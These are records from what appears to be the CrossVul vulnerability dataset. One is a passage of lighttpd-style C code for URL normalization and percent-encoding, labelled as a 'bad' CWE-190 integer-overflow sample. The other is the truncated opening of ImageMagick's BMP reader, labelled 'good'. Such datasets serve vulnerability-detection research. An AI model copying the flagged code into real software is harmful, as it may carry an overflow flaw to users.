0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, /* 70 - 7F { | } DEL */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 80 - 8F */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 90 - 9F */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* A0 - AF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* B0 - BF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* C0 - CF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* D0 - DF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* E0 - EF */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* F0 - FF */
};
/* c (char) and n (nibble) MUST be unsigned integer types */
#define li_cton(c,n) \
(((n) = (c) - '0') <= 9 || (((n) = ((c)&0xdf) - 'A') <= 5 ? ((n) += 10) : 0))
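/* li_cton(c,n): converts a hex digit c ('0'-'9', 'A'-'F', 'a'-'f') to its
 * numeric value in n; evaluates non-zero on success, so it doubles as a
 * validity test for the digit */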
/* b (byte) MUST be unsigned integer type
* https://en.wikipedia.org/wiki/UTF-8
 * reject overlong encodings of 7-bit ASCII and invalid UTF-8
* (but does not detect other overlong multi-byte encodings) */
#define li_utf8_invalid_byte(b) ((b) >= 0xF5 || ((b)|0x1) == 0xC1)
static int burl_is_unreserved (const int c)
{
return (light_isalnum(c) || c == '-' || c == '.' || c == '_' || c == '~');
}
static int burl_normalize_basic_unreserved_fix (buffer *b, buffer *t, int i, int qs)
{
int j = i;
const int used = (int)buffer_string_length(b);
const unsigned char * const s = (unsigned char *)b->ptr;
unsigned char * const p =
(unsigned char *)buffer_string_prepare_copy(t,i+(used-i)*3+1);
unsigned int n1, n2;
memcpy(p, s, (size_t)i);
for (; i < used; ++i, ++j) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = j;
p[j] = s[i];
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved(x)) {
p[j] = x;
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[n1]; /*(s[i+1] & 0xdf)*/
p[++j] = hex_chars_uc[n2]; /*(s[i+2] & 0xdf)*/
if (li_utf8_invalid_byte(x)) qs = -2;
}
i+=2;
}
else if (s[i] == '#') break; /* ignore fragment */
else {
p[j] = '%';
p[++j] = hex_chars_uc[(s[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[s[i] & 0xF];
if (li_utf8_invalid_byte(s[i])) qs = -2;
}
}
buffer_commit(t, (size_t)j);
buffer_copy_buffer(b, t);
return qs;
}
static int burl_normalize_basic_unreserved (buffer *b, buffer *t)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
unsigned int n1, n2, x;
int qs = -1;
for (int i = 0; i < used; ++i) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = i;
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)
&& !burl_is_unreserved((x = (n1 << 4) | n2))) {
if (li_utf8_invalid_byte(x)) qs = -2;
if (s[i+1] >= 'a') b->ptr[i+1] &= 0xdf; /* uppercase hex */
if (s[i+2] >= 'a') b->ptr[i+2] &= 0xdf; /* uppercase hex */
i+=2;
}
else if (s[i] == '#') { /* ignore fragment */
buffer_string_set_length(b, (size_t)i);
break;
}
else {
qs = burl_normalize_basic_unreserved_fix(b, t, i, qs);
break;
}
}
return qs;
}
static int burl_normalize_basic_required_fix (buffer *b, buffer *t, int i, int qs)
{
int j = i;
const int used = (int)buffer_string_length(b);
const unsigned char * const s = (unsigned char *)b->ptr;
unsigned char * const p =
(unsigned char *)buffer_string_prepare_copy(t,i+(used-i)*3+1);
unsigned int n1, n2;
memcpy(p, s, (size_t)i);
for (; i < used; ++i, ++j) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = j;
p[j] = s[i];
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (!encoded_chars_http_uri_reqd[x]
&& (qs < 0 ? (x!='/'&&x!='?') : (x!='&'&&x!='='&&x!=';'))) {
p[j] = x;
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[n1]; /*(s[i+1] & 0xdf)*/
p[++j] = hex_chars_uc[n2]; /*(s[i+2] & 0xdf)*/
if (li_utf8_invalid_byte(x)) qs = -2;
}
i+=2;
}
else if (s[i] == '#') break; /* ignore fragment */
else {
p[j] = '%';
p[++j] = hex_chars_uc[(s[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[s[i] & 0xF];
if (li_utf8_invalid_byte(s[i])) qs = -2;
}
}
buffer_commit(t, (size_t)j);
buffer_copy_buffer(b, t);
return qs;
}
static int burl_normalize_basic_required (buffer *b, buffer *t)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
unsigned int n1, n2, x;
int qs = -1;
for (int i = 0; i < used; ++i) {
if (!encoded_chars_http_uri_reqd[s[i]]) {
if (s[i] == '?' && -1 == qs) qs = i;
}
else if (s[i]=='%' && li_cton(s[i+1], n1) && li_cton(s[i+2], n2)
&& (encoded_chars_http_uri_reqd[(x = (n1 << 4) | n2)]
||(qs < 0 ? (x=='/'||x=='?') : (x=='&'||x=='='||x==';')))){
if (li_utf8_invalid_byte(x)) qs = -2;
if (s[i+1] >= 'a') b->ptr[i+1] &= 0xdf; /* uppercase hex */
if (s[i+2] >= 'a') b->ptr[i+2] &= 0xdf; /* uppercase hex */
i+=2;
}
else if (s[i] == '#') { /* ignore fragment */
buffer_string_set_length(b, (size_t)i);
break;
}
else {
qs = burl_normalize_basic_required_fix(b, t, i, qs);
break;
}
}
return qs;
}
static int burl_contains_ctrls (const buffer *b)
{
const char * const s = b->ptr;
const int used = (int)buffer_string_length(b);
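/* flag any percent-encoded control character: "%0x"/"%1x" (0x00-0x1F) or
 * "%7F" (DEL); assumes prior normalization left only uppercase hex digits
 * after '%' */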
for (int i = 0; i < used; ++i) {
if (s[i] == '%' && (s[i+1] < '2' || (s[i+1] == '7' && s[i+2] == 'F')))
return 1;
}
return 0;
}
static void burl_normalize_qs20_to_plus_fix (buffer *b, int i)
{
char * const s = b->ptr;
const int used = (int)buffer_string_length(b);
int j = i;
for (; i < used; ++i, ++j) {
s[j] = s[i];
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == '0') {
s[j] = '+';
i+=2;
}
}
buffer_string_set_length(b, j);
}
static void burl_normalize_qs20_to_plus (buffer *b, int qs)
{
const char * const s = b->ptr;
const int used = qs < 0 ? 0 : (int)buffer_string_length(b);
int i;
if (qs < 0) return;
for (i = qs+1; i < used; ++i) {
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == '0') break;
}
if (i != used) burl_normalize_qs20_to_plus_fix(b, i);
}
static int burl_normalize_2F_to_slash_fix (buffer *b, int qs, int i)
{
char * const s = b->ptr;
const int blen = (int)buffer_string_length(b);
const int used = qs < 0 ? blen : qs;
int j = i;
for (; i < used; ++i, ++j) {
s[j] = s[i];
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == 'F') {
s[j] = '/';
i+=2;
}
}
if (qs >= 0) {
memmove(s+j, s+qs, blen - qs);
j += blen - qs;
}
buffer_string_set_length(b, j);
return qs;
}
static int burl_normalize_2F_to_slash (buffer *b, int qs, int flags)
{
/*("%2F" must already have been uppercased during normalization)*/
const char * const s = b->ptr;
const int used = qs < 0 ? (int)buffer_string_length(b) : qs;
for (int i = 0; i < used; ++i) {
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == 'F') {
return (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_DECODE)
? burl_normalize_2F_to_slash_fix(b, qs, i)
: -2; /*(flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_REJECT)*/
}
}
return qs;
}
static int burl_normalize_path (buffer *b, buffer *t, int qs, int flags)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
int path_simplify = 0;
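/* cheap scan of the path (up to the query string) for "." or ".." segments
 * and for "//"; only when one is found is the full buffer_path_simplify()
 * pass performed below */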
for (int i = 0, len = qs < 0 ? used : qs; i < len; ++i) {
if (s[i] == '.' && (s[i+1] != '.' || ++i)
&& (s[i+1] == '/' || s[i+1] == '?' || s[i+1] == '\0')) {
path_simplify = 1;
break;
}
do { ++i; } while (i < len && s[i] != '/');
if (s[i] == '/' && s[i+1] == '/') { /*(s[len] != '/')*/
path_simplify = 1;
break;
}
}
if (path_simplify) {
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REJECT) return -2;
if (qs >= 0) {
buffer_copy_string_len(t, b->ptr+qs, used - qs);
buffer_string_set_length(b, qs);
}
buffer_path_simplify(b, b);
if (qs >= 0) {
qs = (int)buffer_string_length(b);
buffer_append_string_len(b, CONST_BUF_LEN(t));
}
}
return qs;
}
int burl_normalize (buffer *b, buffer *t, int flags)
{
int qs;
#if defined(__WIN32) || defined(__CYGWIN__)
/* Windows and Cygwin treat '\\' as '/' if '\\' is present in path;
* convert to '/' for consistency before percent-encoding
* normalization which will convert '\\' to "%5C" in the URL.
* (Clients still should not be sending '\\' unencoded in requests.) */
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_BACKSLASH_TRANS) {
for (char *p = b->ptr; *p != '?' && *p != '\0'; ++p) {
if (*p == '\\') *p = '/';
}
}
#endif
qs = (flags & HTTP_PARSEOPT_URL_NORMALIZE_REQUIRED)
? burl_normalize_basic_required(b, t)
: burl_normalize_basic_unreserved(b, t);
if (-2 == qs) return -2;
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_CTRLS_REJECT) {
if (burl_contains_ctrls(b)) return -2;
}
if (flags & (HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_DECODE
|HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_REJECT)) {
qs = burl_normalize_2F_to_slash(b, qs, flags);
if (-2 == qs) return -2;
}
if (flags & (HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REMOVE
|HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REJECT)) {
qs = burl_normalize_path(b, t, qs, flags);
if (-2 == qs) return -2;
}
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_QUERY_20_PLUS) {
if (qs >= 0) burl_normalize_qs20_to_plus(b, qs);
}
return qs;
}
static void burl_append_encode_nde (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~
* unless already percent-encoded (does not double-encode) */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
unsigned int n1, n2;
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (str[i]=='%' && li_cton(str[i+1], n1) && li_cton(str[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved((int)x)) {
p[j] = (char)x;
}
else { /* leave UTF-8, control chars, and required chars encoded */
p[j] = '%';
p[++j] = str[i+1];
p[++j] = str[i+2];
}
i+=2;
}
else if (burl_is_unreserved(str[i])) {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_append_encode_psnde (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~ plus /
* unless already percent-encoded (does not double-encode) */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
unsigned int n1, n2;
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (str[i]=='%' && li_cton(str[i+1], n1) && li_cton(str[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved((int)x)) {
p[j] = (char)x;
}
else { /* leave UTF-8, control chars, and required chars encoded */
p[j] = '%';
p[++j] = str[i+1];
p[++j] = str[i+2];
}
i+=2;
}
else if (burl_is_unreserved(str[i]) || str[i] == '/') {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_append_encode_all (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~
 * (Note: double-encodes any existing '%') */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (burl_is_unreserved(str[i])) {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_offset_tolower (buffer * const b, const size_t off)
{
/*(skips over all percent-encodings, including encoding of alpha chars)*/
for (char *p = b->ptr+off; p[0]; ++p) {
if (p[0] >= 'A' && p[0] <= 'Z') p[0] |= 0x20;
else if (p[0]=='%' && light_isxdigit(p[1]) && light_isxdigit(p[2]))
p+=2;
}
}
static void burl_offset_toupper (buffer * const b, const size_t off)
{
/*(skips over all percent-encodings, including encoding of alpha chars)*/
for (char *p = b->ptr+off; p[0]; ++p) {
if (p[0] >= 'a' && p[0] <= 'z') p[0] &= 0xdf;
else if (p[0]=='%' && light_isxdigit(p[1]) && light_isxdigit(p[2]))
p+=2;
}
}
void burl_append (buffer * const b, const char * const str, const size_t len, const int flags)
{
size_t off = 0;
if (0 == len) return;
if (0 == flags) {
buffer_append_string_len(b, str, len);
return;
}
if (flags & (BURL_TOUPPER|BURL_TOLOWER)) off = buffer_string_length(b);
if (flags & BURL_ENCODE_NONE) {
buffer_append_string_len(b, str, len);
}
else if (flags & BURL_ENCODE_ALL) {
burl_append_encode_all(b, str, len);
}
else if (flags & BURL_ENCODE_NDE) {
burl_append_encode_nde(b, str, len);
}
else if (flags & BURL_ENCODE_PSNDE) {
burl_append_encode_psnde(b, str, len);
}
else if (flags & BURL_ENCODE_B64U) {
const unsigned char *s = (const unsigned char *)str;
buffer_append_base64_encode_no_padding(b, s, len, BASE64_URL);
}
else if (flags & BURL_DECODE_B64U) {
buffer_append_base64_decode(b, str, len, BASE64_URL);
}
/* note: not normalizing str, which could come from arbitrary header,
* so it is possible that alpha chars are percent-encoded upper/lowercase */
if (flags & (BURL_TOLOWER|BURL_TOUPPER)) {
(flags & BURL_TOLOWER)
? burl_offset_tolower(b, off) /*(flags & BURL_TOLOWER)*/
: burl_offset_toupper(b, off); /*(flags & BURL_TOUPPER)*/
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_797_0 |
crossvul-cpp_data_good_5223_1 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% BBBB M M PPPP %
% B B MM MM P P %
% BBBB M M M PPPP %
% B B M M P %
% BBBB M M P %
% %
% %
% Read/Write Microsoft Windows Bitmap Image Format %
% %
% Software Design %
% Cristy %
% Glenn Randers-Pehrson %
% December 2001 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
/*
Macro definitions (from Windows wingdi.h).
*/
#undef BI_JPEG
#define BI_JPEG 4
#undef BI_PNG
#define BI_PNG 5
#if !defined(MAGICKCORE_WINDOWS_SUPPORT) || defined(__MINGW32__) || defined(__MINGW64__)
#undef BI_RGB
#define BI_RGB 0
#undef BI_RLE8
#define BI_RLE8 1
#undef BI_RLE4
#define BI_RLE4 2
#undef BI_BITFIELDS
#define BI_BITFIELDS 3
#undef LCS_CALIBRATED_RBG
#define LCS_CALIBRATED_RBG 0
#undef LCS_sRGB
#define LCS_sRGB 1
#undef LCS_WINDOWS_COLOR_SPACE
#define LCS_WINDOWS_COLOR_SPACE 2
#undef PROFILE_LINKED
#define PROFILE_LINKED 3
#undef PROFILE_EMBEDDED
#define PROFILE_EMBEDDED 4
#undef LCS_GM_BUSINESS
#define LCS_GM_BUSINESS 1 /* Saturation */
#undef LCS_GM_GRAPHICS
#define LCS_GM_GRAPHICS 2 /* Relative */
#undef LCS_GM_IMAGES
#define LCS_GM_IMAGES 4 /* Perceptual */
#undef LCS_GM_ABS_COLORIMETRIC
#define LCS_GM_ABS_COLORIMETRIC 8 /* Absolute */
#endif
/*
Typedef declarations.
*/
typedef struct _BMPInfo
{
unsigned long
file_size,
ba_offset,
offset_bits,
size;
ssize_t
width,
height;
unsigned short
planes,
bits_per_pixel;
unsigned long
compression,
image_size,
x_pixels,
y_pixels,
number_colors,
red_mask,
green_mask,
blue_mask,
alpha_mask,
colors_important;
long
colorspace;
PrimaryInfo
red_primary,
green_primary,
blue_primary,
gamma_scale;
} BMPInfo;
/*
Forward declarations.
*/
static MagickBooleanType
WriteBMPImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage unpacks run-length encoded image pixels into an uncompressed
% array of pixel values.
%
% The format of the DecodeImage method is:
%
% MagickBooleanType DecodeImage(Image *image,
% const size_t compression,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o compression: Zero means uncompressed. A value of 1 means the
% compressed pixels are runlength encoded for a 256-color bitmap.
% A value of 2 means a 16-color bitmap. A value of 3 means bitfields
% encoding.
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the decoding process.
%
*/
static MagickBooleanType DecodeImage(Image *image,const size_t compression,
unsigned char *pixels)
{
int
count;
register ssize_t
i,
x;
register unsigned char
*p,
*q;
ssize_t
y;
unsigned char
byte;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (unsigned char *) NULL);
(void) ResetMagickMemory(pixels,0,(size_t) image->columns*image->rows*
sizeof(*pixels));
byte=0;
x=0;
p=pixels;
q=pixels+(size_t) image->columns*image->rows;
for (y=0; y < (ssize_t) image->rows; )
{
MagickBooleanType
status;
if ((p < pixels) || (p > q))
break;
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count != 0)
{
/*
Encoded mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
byte=(unsigned char) ReadBlobByte(image);
if (compression == BI_RLE8)
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) byte;
}
else
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
}
else
{
/*
Escape mode.
*/
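/*
Escape codes: 0x00 = end of line, 0x01 = end of bitmap, 0x02 = delta (skip
by the following x,y offsets), 0x03-0xff = absolute run of literal pixel
values padded to a 16-bit boundary.
*/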
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count == 0x01)
return(MagickTrue);
switch (count)
{
case 0x00:
{
/*
End of line.
*/
x=0;
y++;
p=pixels+y*image->columns;
break;
}
case 0x02:
{
/*
Delta mode.
*/
x+=ReadBlobByte(image);
y+=ReadBlobByte(image);
p=pixels+y*image->columns+x;
break;
}
default:
{
/*
Absolute mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
if (compression == BI_RLE8)
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) ReadBlobByte(image);
else
for (i=0; i < (ssize_t) count; i++)
{
if ((i & 0x01) == 0)
byte=(unsigned char) ReadBlobByte(image);
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
/*
Read pad byte.
*/
if (compression == BI_RLE8)
{
if ((count & 0x01) != 0)
(void) ReadBlobByte(image);
}
else
if (((count & 0x03) == 1) || ((count & 0x03) == 2))
(void) ReadBlobByte(image);
break;
}
}
}
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
(void) ReadBlobByte(image); /* end of line */
(void) ReadBlobByte(image);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses pixels using a runlength encoded format.
%
% The format of the EncodeImage method is:
%
% static MagickBooleanType EncodeImage(Image *image,
% const size_t bytes_per_line,const unsigned char *pixels,
% unsigned char *compressed_pixels)
%
% A description of each parameter follows:
%
% o image: The image.
%
% o bytes_per_line: the number of bytes in a scanline of uncompressed pixels
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the compression process.
%
% o compressed_pixels: The address of a byte (8 bits) array of compressed
% pixel data.
%
*/
static size_t EncodeImage(Image *image,const size_t bytes_per_line,
const unsigned char *pixels,unsigned char *compressed_pixels)
{
MagickBooleanType
status;
register const unsigned char
*p;
register ssize_t
i,
x;
register unsigned char
*q;
ssize_t
y;
/*
Runlength encode pixels.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (const unsigned char *) NULL);
assert(compressed_pixels != (unsigned char *) NULL);
p=pixels;
q=compressed_pixels;
i=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
for (x=0; x < (ssize_t) bytes_per_line; x+=i)
{
/*
Determine runlength.
*/
for (i=1; ((x+i) < (ssize_t) bytes_per_line); i++)
if ((i == 255) || (*(p+i) != *p))
break;
*q++=(unsigned char) i;
*q++=(*p);
p+=i;
}
/*
End of line.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
/*
End of bitmap.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x01;
return((size_t) (q-compressed_pixels));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s B M P %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsBMP() returns MagickTrue if the image format type, identified by the
% magick string, is BMP.
%
% The format of the IsBMP method is:
%
% MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
{
if (length < 2)
return(MagickFalse);
if ((LocaleNCompare((char *) magick,"BA",2) == 0) ||
(LocaleNCompare((char *) magick,"BM",2) == 0) ||
(LocaleNCompare((char *) magick,"IC",2) == 0) ||
(LocaleNCompare((char *) magick,"PI",2) == 0) ||
(LocaleNCompare((char *) magick,"CI",2) == 0) ||
(LocaleNCompare((char *) magick,"CP",2) == 0))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadBMPImage() reads a Microsoft Windows bitmap image file, Version
% 2, 3 (for Windows or NT), or 4, and returns it. It allocates the memory
% necessary for the new Image structure and returns a pointer to the new
% image.
%
% The format of the ReadBMPImage method is:
%
% image=ReadBMPImage(image_info)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
static Image *ReadBMPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
BMPInfo
bmp_info;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
offset,
start_position;
MemoryInfo
*pixel_info;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
register unsigned char
*p;
size_t
bit,
blue,
bytes_per_line,
green,
length,
red;
ssize_t
count,
y;
unsigned char
magick[12],
*pixels;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Determine if this a BMP file.
*/
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.ba_offset=0;
start_position=0;
count=ReadBlob(image,2,magick);
if (count != 2)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
do
{
PixelInfo
quantum_bits;
PixelPacket
shift;
size_t
profile_data,
profile_size;
/*
Verify BMP identifier.
*/
if (bmp_info.ba_offset == 0)
start_position=TellBlob(image)-2;
bmp_info.ba_offset=0;
while (LocaleNCompare((char *) magick,"BA",2) == 0)
{
bmp_info.file_size=ReadBlobLSBLong(image);
bmp_info.ba_offset=ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
count=ReadBlob(image,2,magick);
if (count != 2)
break;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," Magick: %c%c",
magick[0],magick[1]);
if ((count != 2) || ((LocaleNCompare((char *) magick,"BM",2) != 0) &&
(LocaleNCompare((char *) magick,"CI",2) != 0)))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
bmp_info.file_size=ReadBlobLSBLong(image);
(void) ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
bmp_info.size=ReadBlobLSBLong(image);
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," BMP size: %lu",
bmp_info.size);
if (bmp_info.size == 12)
{
/*
OS/2 BMP image file.
*/
(void) CopyMagickString(image->magick,"BMP2",MagickPathExtent);
bmp_info.width=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.height=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.x_pixels=0;
bmp_info.y_pixels=0;
bmp_info.number_colors=0;
bmp_info.compression=BI_RGB;
bmp_info.image_size=0;
bmp_info.alpha_mask=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: OS/2 Bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
}
}
else
{
/*
Microsoft Windows BMP image file.
*/
if (bmp_info.size < 40)
